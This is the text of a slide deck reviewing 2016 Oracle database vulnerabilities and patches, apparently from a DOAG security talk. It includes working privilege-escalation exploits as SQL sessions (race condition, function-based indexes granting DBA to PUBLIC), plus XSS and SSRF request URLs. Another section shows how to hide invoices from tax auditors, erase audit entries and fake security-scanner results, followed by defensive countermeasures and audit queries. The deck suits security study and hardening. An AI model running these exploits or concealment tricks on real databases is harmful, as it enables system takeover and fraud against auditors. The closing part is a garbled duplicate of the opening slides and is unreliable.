Best of Oracle Security 2016
What happened in 2016

Oracle Backdoor & NSA
"Kaspersky report notes that somewhere in mid 2002 or 2003 Equation Group members (= NSA hacker team) used the Oracle database installation CD to infect multiple targets with malware from the group's extensive library."
http://www.techworm.net/2015/02/equation-group-nsa-backdoor-in-hardware-30-countries.html
Agenda
- Intro
- January 2016 - November 2016
- Outlook 2017
- Q&A

Introduction
What will be shown in the next 45 minutes:
- Oracle Security Patches
- Modify SQL statements & Application Logic
- Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
The patch situation is getting better, but Oracle 12c offers a large new playground (= tons of new features) for security researchers.
Problem: just a few people are doing security research in the database.
Nearly 50% of the database vulnerabilities were found/reported by 2 researchers (David Litchfield & Alexander Kornbrust).

Oracle Vulnerabilities 2016
Number of vulnerabilities in the Oracle database increasing again:
- 30 findings in 2016 (2015: 29, 2014: 43, 2013: 13, 2012: 17)
- 8 remote exploitable bugs (2015: 3, 2014: 4, 2013: 7, 2012: 8)
  - January 2016 CPU (7 vulnerabilities, 0 remote)
  - April 2016 CPU (5 vulnerabilities, 2 remote)
  - July 2016 CPU (9 vulnerabilities, 5 remote)
  - October 2016 CPU (9 vulnerabilities, 1 remote)
2016

January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL Race Condition (David Litchfield)
DbDat: Database Assessment Tool
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
http://www.davidlitchfield.com/ExploitingtheOracleWorkspaceManagerSQLRaceCondition.pdf
https://github.com/foospidy/DbDat

January 2016 CPU
7 security fixes (no remote exploitable):
- 1 Java VM (CVSS 9.0)
- 1 Workspace Manager (CVSS 6.5)
- 2 XML Database (CVSS 5.5, 4.0)
- 1 Database Vault (CVSS 4.0)
- 1 Security (CVSS 4.0)
- 1 XML Developer's Kit (CVSS 4.0)
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
Jan 2016 CPU - CVE-2016-0467
http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Problem: Oracle native auditing fails to capture "Create Java Source".
Reporter: David Litchfield
Exploit: obvious, Create Java Source…

Jan 2016 CPU - CVE-2015-4921
http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Problem: Status is incorrectly reported if SYS auditing is used together with DB Vault.
Reporter: David Litchfield

Jan 2016 CPU - CVE-2015-4925
http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Problem: Privilege escalation via race condition in WMSYS.LT.COPYFORUPDATE.
Reporter: David Litchfield
The Oracle Workspace Manager allows a user to version-enable database tables. This is achieved by creating workspaces which contain the versioned data. The Workspace Manager contains a number of PL/SQL packages that are used to manage workspaces. To function correctly, some management actions must be performed with higher privileges than a normal user might have, and so to enable this some of the management functions execute with the privileges of the WMSYS user. The main Workspace Manager interface is the LT PL/SQL package, and this executes with the privileges of the user that calls or invokes LT. When privileged work is required to be executed, LT calls the LTADM package. The LTADM package executes with the privileges of the owner or definer, in this case WMSYS. WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER, which allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema.
Jan 2016 CPU - CVE-2015-4925
SELECT COUNT(*) INTO CNT FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD WHERE OC.SID = USER_SID AND [...] AND OD.TO_TYPE IN (7, 8, 9, 11);
Here OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists then the user-supplied query will not be executed and an error is raised:
IF (CNT > 0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF;
SQL_STR2 := 'declare delstatuses wmsys.ltUtil.number_tab; begin select WM_delstatus bulk collect into delstatuses from ' || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE') || ' where WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update; end;';
WMSYS.LTADM.EXECSQL(SQL_STR2);
Jan 2016 CPU - CVE-2015-4925
SQL> CONNECT RACER/PASSWORD
SQL> CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X));
SQL> INSERT INTO FOO (X) VALUES (1);
SQL> COMMIT;
SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO');
SQL> create or replace function Y return number authid current_user is
  pragma autonomous_transaction;
  begin
    dbms_output.put_line('BANG');
    execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
    execute immediate 'grant execute on owned to public';
    dbms_output.put_line(sys_context('userenv', 'current_user'));
    return 1;
  end;
  /
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;
SQL> create or replace procedure attempt_it is
  begin
    execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
  exception when others then
    null;
  end;
  /
SQL> declare
  i number := 0;
  begin
    for i in 1..1000 loop
      execute immediate 'alter table RACER.RACER rename column Y to Z';
      execute immediate 'alter table RACER.RACER rename column Z to Y';
    end loop;
  end;
  /
SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name    Type       In/Out Default?
 ---------------- ---------- ------ --------
 P                VARCHAR2   IN
February 2016
Nothing special happened.

March 2016
Nothing special happened.

April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html

April 2016 CPU
5 security fixes (2 remote exploitable):
- 1 Java VM (CVSS 9.0)
- 1 OLAP (CVSS 7.8)
- 3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, we must also add:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;
Reporter: David Litchfield

Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing (due to no execute privilege) function is within a SELECT query, the name of the function is not logged, but the name of the table in the query is.
Reporter: David Litchfield
Exploit: obvious, Create Java Source…
May 2016
Nothing special happened.

June 2016
Nothing special happened.

July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html

July 2016 CPU
9 security fixes (5 remote exploitable):
- 1 OJVM (CVSS 9.0)
- 1 JDBC (CVSS 8.1, remote)
- 1 Portable Clusterware (CVSS 7.5, remote)
- 1 Data Pump (CVSS 6.7)
- 2 APEX (CVSS 6.1, 5.8; 2 remote)
- 1 RDBMS Security (CVSS 5.3, remote)
- 1 DB Sharding (CVSS 4.4)
- 1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1

Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port <port> and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Jul 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows to change database parameters without the admin privileges and restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');

Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS: re-run again after execution of the package
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS can influence the DVSYS analysis
Reporter: Alexander Kornbrust
(Details + exploit later…)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner = 'SYS';
GRANTEE  OWNER  TABLE_NAME
-------  -----  ----------
SYSTEM   SYS    INCEXP
SYSTEM   SYS    INCFIL
SYSTEM   SYS    INCVID
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1: ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1: ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
COUNT(*)
--------
11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1))
FEHLER in Zeile 1: ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf

September 2016
Nothing special happened.
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU
9 security fixes (1 remote exploitable):
- 1 OJVM (CVSS 9.1)
- 2 Kernel PDB (CVSS 6.4, 6.0)
- 3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
- 1 APEX (CVSS 6.1, remote)
- 1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

Oct 2016 CPU - CVE-2016-5497
Problem: Unsalted MD5 hash still present in the 12c database (digest verifier)
Shown as an open problem at the DOAG 2015 presentation.
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.

Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5('XDB:tiger')
and is stored in the spare4 column, starting with the 'H:' hash.
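A defender's inventory for the unsalted H: verifier just described, added here as an example and not part of the original slides. It reads the verifier list from SYS.USER$.SPARE4 as the slide states; that DBA_USERS.PASSWORD_VERSIONS reports the same verifier as 'HTTP' is an assumption.

```sql
-- Added example (not from the original slides). Run as SYS on 12.1.0.2+:
-- which accounts still carry the unsalted MD5 "H:" digest verifier?
-- SYS.USER$.SPARE4 holds the verifier list ("S:...;H:...;T:...");
-- DBA_USERS.PASSWORD_VERSIONS is the supported view of the same information
-- (assumption: 'HTTP' there corresponds to the H: entry).
-- Because the digest has no salt, every database that has the same password
-- for an account stores the identical H: value, so this list is worth knowing.
SELECT u.name AS username,
       du.account_status,
       CASE WHEN u.spare4 LIKE '%H:%' THEN 'YES' ELSE 'NO' END AS md5_digest_h,
       CASE WHEN u.spare4 LIKE '%S:%' THEN 'YES' ELSE 'NO' END AS sha1_s,
       CASE WHEN u.spare4 LIKE '%T:%' THEN 'YES' ELSE 'NO' END AS pbkdf2_sha512_t,
       du.password_versions
  FROM sys.user$ u
  JOIN dba_users du ON du.username = u.name
 WHERE u.type# = 1                        -- 1 = user, 0 = role
   AND u.spare4 IS NOT NULL               -- password-authenticated accounts only
 ORDER BY md5_digest_h DESC, u.name;
```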
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
$ sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR: ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME    PRIVILEGE             ADM
----------  --------------------  ---
SYSMAN_APM  UNLIMITED TABLESPACE  NO
SYSMAN_APM  CREATE VIEW           NO
SYSMAN_APM  CREATE ANY LIBRARY    NO
SYSMAN_APM  CREATE SEQUENCE       NO
SYSMAN_APM  CREATE TABLE          NO
SYSMAN_APM  CREATE LIBRARY        NO
SYSMAN_APM  CREATE ANY INDEX      NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME    GRANTED_ROLE  ADM  DEF  OS_
----------  ------------  ---  ---  ---
SYSMAN_APM  CONNECT       NO   YES  NO
SYSMAN_APM  RESOURCE      NO   YES  NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI); the function getdba is used for the function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role = 'DBA' and grantee = 'PUBLIC';
GRANTEE  GRANTED_ROLE  ADM  DEF
-------  ------------  ---  ---
PUBLIC   DBA           NO   YES
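Detection and audit checks for the function-based-index escalation pattern shared by CVE-2016-3489 and CVE-2016-5604 above, added here as an example and not part of the original slides. The dictionary views and audit options are Oracle's own; which grants a reviewer treats as suspicious is an assumption.

```sql
-- Added example (not from the original slides). Run as a DBA on 11.2 / 12.1.
-- The pattern in CVE-2016-3489 and CVE-2016-5604: a low-privileged user owns an
-- AUTHID CURRENT_USER function, holds INDEX or CREATE ANY INDEX on a table of a
-- powerful schema, and lets the table owner evaluate that function for him by
-- building a function-based index. Three queries make this visible.

-- 1. Who may build indexes on tables they do not own? (INHERIT ANY PRIVILEGES
--    is the 12c privilege that re-enables the 11g behaviour shown above.)
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND grantee <> owner
UNION ALL
SELECT grantee, '(any)' AS owner, '(any)' AS table_name, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'INHERIT ANY PRIVILEGES')
 ORDER BY 1, 2, 3;

-- 2. Function-based indexes whose expression calls code from a third schema.
--    DBA_IND_EXPRESSIONS.COLUMN_EXPRESSION is a LONG and awkward to filter, but
--    an FBI is registered in DBA_DEPENDENCIES as an INDEX that depends on the
--    FUNCTION or PACKAGE it calls, so that path is used instead. The AUTHID
--    column shows whether the function runs with the caller's rights.
SELECT i.owner       AS index_owner,
       i.index_name,
       i.table_owner,
       i.table_name,
       d.referenced_owner || '.' || d.referenced_name AS called_code,
       p.authid
  FROM dba_indexes i
  JOIN dba_dependencies d
    ON d.owner = i.owner
   AND d.name  = i.index_name
   AND d.type  = 'INDEX'
  LEFT JOIN dba_procedures p
    ON p.owner       = d.referenced_owner
   AND p.object_name = d.referenced_name
   AND p.object_type = d.referenced_type
   AND p.procedure_name IS NULL
 WHERE i.index_type LIKE 'FUNCTION-BASED%'
   AND d.referenced_type IN ('FUNCTION', 'PACKAGE')
   AND d.referenced_owner NOT IN ('SYS', i.table_owner)
 ORDER BY i.table_owner, i.table_name, i.index_name;

-- 3. Make the next EXPLOIT_INDEX show up in the audit trail (traditional
--    auditing; AUDIT_TRAIL must be set): CREATE/ALTER/DROP INDEX statements
--    and every use of the CREATE ANY INDEX privilege are recorded.
AUDIT INDEX BY ACCESS;
AUDIT CREATE ANY INDEX BY ACCESS;
```

Both exploit sessions on the slides would appear in query 2 as an index on SYS.INCVID or SYSTEM.HELP whose called_code lives in SYSTEM, WMSYS or SYSMAN_APM with authid CURRENT_USER.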
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic

Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice, just from the auditor, from the last party at the night club? I will increase your salary…"

Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.

Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.

A lot of different wishes…
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate SQL statements.

Select value …
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user.
Possible usage: replace TRUE/FALSE, replace USER/ADMIN, … the DBA can decide what will be returned.

Select value …
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as man in the middle as well.
Possible approaches:
- modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 will be removed from the view. If a SIEM solution retrieves the audit data, the stuff from DBA1 is not retrieved.
- create or change synonyms to "redirect" objects
- replace a table with a view / instead-of trigger
---------- dbms_macadm ----------
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS can influence the DVSYS analysis via a view named DUAL.
Red Attack - "Die Katastrophe in der Datenbank" ("The catastrophe in the database", Gunther Pipperr)
… where x=y
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.

Select value from table/view where x=y
The SQL Translation Framework (12c only) allows to replace an entire query: the user submits query A, the SQL Translation Framework replaces query A with query B.
Possible Countermeasures for paranoid Auditors
- Add a random string (e.g. aksdjhiuz) to avoid the SQL Translation Framework (new SQL_ID)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
Modifying Queries on the fly
- Powerful features for applications
- (Huge) potential on critical systems to modify application logic (e.g. DB Vault)
- DBAs and auditors/security department should be aware of powerful Oracle features which could be used to modify application logic
- Audit these features even if not in use
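The auditor's countermeasures and the "audit these features" advice above turned into SQL, added here as an example and not part of the original slides. Part A runs in the auditor's own session, Part B as DBA; dictionary views, USERENV parameters and audit options are Oracle's, while the object list (INVOICES, DBA_AUDIT_TRAIL) and the random tag are assumptions.

```sql
-- Added example (not from the original slides). Oracle 12c unless noted.

-- A1. Is an ALTER SESSION SET CURRENT_SCHEMA in effect? If so, unqualified
--     names resolve into another schema before my own.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;

-- A2. What do DUAL and the objects I am about to audit actually resolve to,
--     and what type are they (table, view, or a synonym pointing elsewhere)?
SELECT o.owner, o.object_name, o.object_type,
       s.table_owner || '.' || s.table_name AS synonym_target
  FROM all_objects o
  LEFT JOIN all_synonyms s
    ON s.owner = o.owner AND s.synonym_name = o.object_name
 WHERE o.object_name IN ('DUAL', 'INVOICES', 'DBA_AUDIT_TRAIL')   -- assumed list
 ORDER BY o.object_name, o.owner;

-- A3. Checksum the objects I rely on and compare with a reference taken from a
--     known-good system; a smuggled predicate such as spare != 'DBA1' changes
--     the hash. Needs EXECUTE ON DBMS_CRYPTO and SELECT_CATALOG_ROLE
--     (HASH_SH256 exists from 12c on; use HASH_SH1 on 11g).
SELECT owner, object_name, object_type,
       RAWTOHEX(DBMS_CRYPTO.HASH(
           DBMS_METADATA.GET_DDL(object_type, object_name, owner),
           DBMS_CRYPTO.HASH_SH256)) AS ddl_sha256
  FROM all_objects
 WHERE (owner, object_name) IN (('SYS', 'DBA_AUDIT_TRAIL'), ('SYS', 'DUAL'), ('PUBLIC', 'DUAL'))
   AND object_type IN ('TABLE', 'VIEW', 'SYNONYM');

-- A4. Vary the statement text: the always-true tag predicate changes the SQL
--     text and therefore the SQL_ID, so a SQL Translation Framework entry
--     registered for the exact checklist query no longer matches.
SELECT UPPER(value)
  FROM v$parameter
 WHERE UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY'
   AND 'aksdjhiuz' = 'aksdjhiuz';

-- B1. (as DBA) Which rewriting features are active, and who can bypass VPD?
SELECT 'DATA REDACTION' AS feature,
       object_owner || '.' || object_name AS target,
       policy_name AS detail
  FROM redaction_policies
UNION ALL
SELECT 'VPD POLICY', object_owner || '.' || object_name,
       policy_name || ' -> ' || pf_owner || '.' || function
  FROM dba_policies
UNION ALL
SELECT 'SQL TRANSLATION', profile_owner || '.' || profile_name,
       sql_id || ': ' || DBMS_LOB.SUBSTR(sql_text, 60, 1)
  FROM dba_sql_translations
UNION ALL
SELECT 'PUBLIC SYNONYM NOT TO SYS', synonym_name, table_owner || '.' || table_name
  FROM dba_synonyms
 WHERE owner = 'PUBLIC'
   AND synonym_name IN ('DUAL', 'DBA_AUDIT_TRAIL', 'DBA_USERS', 'V$PARAMETER')
   AND table_owner <> 'SYS'
UNION ALL
SELECT 'EXEMPT ACCESS POLICY', grantee, 'bypasses every VPD policy'
  FROM dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- B2. (as DBA) Audit the features even when they are not in use, so the first
--     redaction policy, VPD policy, translation or repointed synonym is logged.
AUDIT EXECUTE ON sys.dbms_redact BY ACCESS;
AUDIT EXECUTE ON sys.dbms_rls BY ACCESS;
AUDIT EXECUTE ON sys.dbms_sql_translator BY ACCESS;
AUDIT SYNONYM, PUBLIC SYNONYM, VIEW BY ACCESS;
AUDIT ALTER SESSION BY ACCESS;
```

Against the DUAL trick shown on the dbms_macadm slide, A2 reports PUBLIC.DUAL as a SYNONYM whose target is SYS.MYDUAL instead of SYS.DUAL, and A3 yields a hash that differs from the reference.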
Trends 2017
- New hardening documents for Oracle 12.2 required (new features, new packages, …)
- Migration to 12.2
- More auditing projects
- Integration of auditing with SIEM solutions

Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Backdoor amp NSA
Kaspersky report notes that somewhere in mid
2002 or 2003 Equation Group members (=NSA Hacker Team) used the Oracle database
installation CD to infect multiple targets with
malware from the grouprsquos extensive libraryldquo
httpwwwtechwormnet201502equation-group-nsa-backdoor-in-hardware-30-countrieshtml
Agenda
iexcl Intro
iexcl January 2016 - November 2016
iexcl Outlook 2017
iexcl QampA
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
